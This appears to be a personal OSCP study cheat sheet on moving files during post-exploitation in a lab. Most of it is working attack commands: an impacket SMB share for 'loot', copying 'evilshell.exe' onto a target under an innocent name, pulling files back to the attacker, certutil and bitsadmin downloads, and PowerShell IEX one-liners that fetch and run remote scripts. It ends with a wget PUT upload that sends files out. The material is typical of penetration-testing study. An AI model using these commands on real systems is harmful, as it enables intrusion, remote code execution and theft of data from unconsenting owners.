Backlink: reference-notes-readme


File Transfers

Using Windows SMB:

Transferring Files from Linux to Windows (post-exploitation) - ropnop blog

Stand up impacket SMB server with:

python /var/lib/impacket/examples/smbserver.py JOEY /root/cybersecurity/Offensive\ Security/OSCP/lab-pentest/public/results/10.11.1.5/loot/

To transfer files from the host to the target use:

copy \\192.168.119.172\JOEY\evilshell.exe innocentfile.exe

Transfer files from Windows target to host with:

copy juicyfile.txt \\192.168.119.172\JOEY\

HTTP Server

Spawning Python HTTP Server

python -m SimpleHTTPServer

Default launch starts HTTP server on port 8000. Any HTML file in shared directory will override ability to share files and just serve that html as a webpage.

Use the following base one-liner to serve files from /usr/share/webshells/cfm/ directory without changing into it:

pushd /usr/share/webshells/cfm/; python -m SimpleHTTPServer; popd;

File Download from Windows

To download files from Windows client using CertUtil (Note: AV will often trigger on this!):

certutil.exe -urlcache -split -f http://10.10.15.136/winPEAS.exe

Better option is to use bitsadmin:

bitsadmin /Transfer myJob http://192.168.49.105/file.txt C:\Users\student\enc.txt

Remote Script Execution

Use the following to source and execute a rom a remote HTTP server on the local Windows machine (Note: This is NOT proxy-aware):

IEX(New-Object Net.webClient).downloadString('http://192.168.49.105/bchat.txt')

A better, proxy-aware alternative is the following one-liner:

$webclient=(New-Object Net.WebClient);$webclient.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $webclient.DownloadString("")

### File Upload with wget

wget --method PUT --body-file=./file.pdf http://192.168.119.172:8000/file.pdf -O - -nv